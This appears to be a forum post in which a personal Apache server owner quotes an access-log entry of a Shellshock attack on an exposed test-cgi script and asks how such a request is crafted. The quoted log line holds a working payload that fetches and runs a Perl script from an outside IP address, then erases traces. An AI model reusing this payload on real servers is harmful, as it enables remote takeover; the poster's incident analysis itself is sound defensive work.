Apologies in advance for a simple question to which there is probably a very simple answer. Here is the story:
I have OSX 10.4.7 running Apache 2.2.13 for an unimportant personal web site. Unfortunately I left test-cgi exposed in my cgi-lib.
Looking at logs recently I see this entry:
s217.silver.servdiscount-customer.com - - [27/Feb/2015:21:55:49 -0600] "GET /cgi-bin/test-cgi HTTP/1.1" 200 492 "() { :; }; /bin/bash -c "perl -e '\$p=fork;exit,if(\$p); use Socket; use FileHandle; my \$system = \"/bin/sh\"; system(\"killall -9 perl;cd /tmp;wget 85.114.141.217/c.pl;perl c.pl;rm -rf c.pl;lwp-download http://ift.tt/1KkllxL c.pl;rm -rf c.pl;history -c\"); system(\$system);'"" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0"
The system seems undamaged. The file c.pl contains an IRC server but it does not seem to be active.
What I am trying to understand is how this GET request got passed to Apache. What program might have been used to craft the request?
I would like to be able to do that myself in order to try a few things on my own server. I've looked at CGI and using Telnet to pass this to Apache but I cannot find the way.
Thank you in advance for any suggestions you may have.
Aucun commentaire:
Enregistrer un commentaire